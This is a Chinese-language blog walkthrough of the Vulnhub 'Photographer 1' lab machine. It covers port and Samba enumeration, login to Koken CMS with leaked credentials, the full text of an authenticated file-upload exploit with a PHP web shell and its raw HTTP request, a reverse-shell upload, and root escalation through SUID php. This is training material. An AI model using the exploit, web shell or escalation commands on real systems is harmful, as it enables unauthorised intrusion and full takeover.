首页 > 其他分享 >Vulnhub: Photographer 1靶机

Vulnhub: Photographer 1靶机

时间:2023-05-20 17:34:01浏览次数:52  
标签:name Photographer Content ----------------------------- Vulnhub 靶机 php data 2391

kali:192.168.111.111

靶机:192.168.111.132

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.132

image

目标8000端口为koken cms

image

image

使用enum4linux枚举目标samba服务,发现共享文件夹

enum4linux -a 192.168.111.132

image

连接目标共享文件夹,发现两个文件

smbclient -N \\\\192.168.111.132\\sambashare

image

mailsent.txt文件内容

image

使用[email protected] | babygirl,登录koken后台

image

同时该版本的koken cms存在文件上传漏洞

searchsploit koken

image

# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
# Date: 2020-07-15
# Exploit Author: v1n1v131r4
# Vendor Homepage: http://koken.me/
# Software Link: https://www.softaculous.com/apps/cms/Koken
# Version: 0.22.24
# Tested on: Linux
# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md

The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.

Steps to exploit:

1. Create a malicious PHP file with this content:

   <?php system($_GET['cmd']);?>

2. Save as "image.php.jpg"

3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.

4. On Burp, rename your file to "image.php"


POST /koken/api.php?/content HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/koken/admin/
x-koken-auth: cookie
Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
Content-Length: 1043
Connection: close
Cookie: PHPSESSID= [Cookie value here]

-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="name"

image.php
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunk"

0
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunks"

1
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="upload_session_start"

1594831856
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="visibility"

public
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="license"

all
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="max_download"

none
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg

<?php system($_GET['cmd']);?>

-----------------------------2391361183188899229525551--



5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.

漏洞利用

利用burp抓包,修改上传文件的后缀,jpg改为php即可上传

image

image

image

访问``http://192.168.111.132:8000/storage/originals/cb/43/php-reverse-shell.php`获得反弹shell

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/php/#suid

image

提升为root

php -r "pcntl_exec('/bin/sh', ['-p']);"

image

flag

image

标签:name,Photographer,Content,-----------------------------,Vulnhub,靶机,php,data,2391
From: https://www.cnblogs.com/ctostm/p/17417502.html

相关文章

  • Vulnhub: Healthcare 1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-......
  • Vulnhub之DriftingBlues 5靶机详细测试过程(得到root shell)
    DriftingBlues5靶机信息名称:DriftingBlues:5地址:https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova识别IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56......
  • Vulnhub: Tiki-1靶机
    kali:192.168.111.111靶机:192.168.111.133信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.133从目标网站的robots.txt文件中,发现存在目录/tiki/访问目录发现为tikicms该cms存在身份验证绕过searchsploittiki漏洞利用使用exp清空admin用......
  • Vulnhub之election靶机详细测试过程
    Election作者:jasonhuawen靶机信息名称:eLection:1URL:https://www.vulnhub.com/entry/election-1,503/识别IP地址─(kali㉿kali)-[~/Vulnhub/Election]└─$sudonetdiscover-ieth1-r192.168.56.0/24urrentlyscanning:192.168.56.0/24|ScreenView:U......
  • Vulnhub-Breach: 2.1
    靶机地址:https://www.vulnhub.com/entry/breach-21,159/目标:Secondinamulti-partseries,Breach2.0isaboot2root/CTFchallengewhichattemptstoshowcaseareal-worldscenario,withplentyoftwistsandtrollsalongtheway.提示:Imaginethisasaproduction......
  • ICA:1~vulnhub
    靶场环境:kali攻击机:10.21.29.198靶机:10.21.29.227信息收集首先进行端口扫描:发现22803306端口登录80端口发现是一登录页面首先可以看到CMS:qdPM9.2攻击过程kali进行漏洞库搜索:searchsploitqdPM9.2查看漏洞详情:```cat/usr/share/exploitdb/exploits/php/weba......
  • vulnhub --> Web Machine: (N7)
    靶场下载地址WebMachine:(N7) <<点我开始打靶ip发现:nmap扫描网段发现靶机ip:192.168.56.101端口发现:对靶机进行常规端口扫描访问网站:目录扫描发现一个叫exploit.html的页面,访问页面发现是一个上传页面随便上传一个文件,点击提交查询,发现跳转到localhost域名CSRF......
  • Vulnhub-dpwwn01-WP
    前言点击>>下载靶机靶机kalilinux:ip地址为192.168.20.200靶机探测使用nmap探测靶机nmap192.168.20.0/24靶机ip为192.168.20.131使用nmap进行详细扫描nmap-A-p-192.168.20.131点击查看扫描结果rootin/home/kalivia☕v17.0.6…➜nmap-A-p-192.168.2......
  • Vulnhub: InfoSec Prep:OSCP靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130访问80端口下的robots.txt文件,内容提示另一个文件/secret.txtsecret.txt文件内容为base64加密的字符串,解密后发现是ssh私钥echo'LS0tLS1CRUdJTiBPU......
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)
    Funbox4靶机信息名称:Funbox:CTFURL:https://www.vulnhub.com/entry/funbox-ctf,546/识别靶机IP地址将靶机导入VirtualBox。配置其网卡为主机模式配置。启动KaliLinux和靶机。内置netdiscovery工具可以将靶机的IP地址识别为192.168.56.150。(kali㉿kali)-[~/D......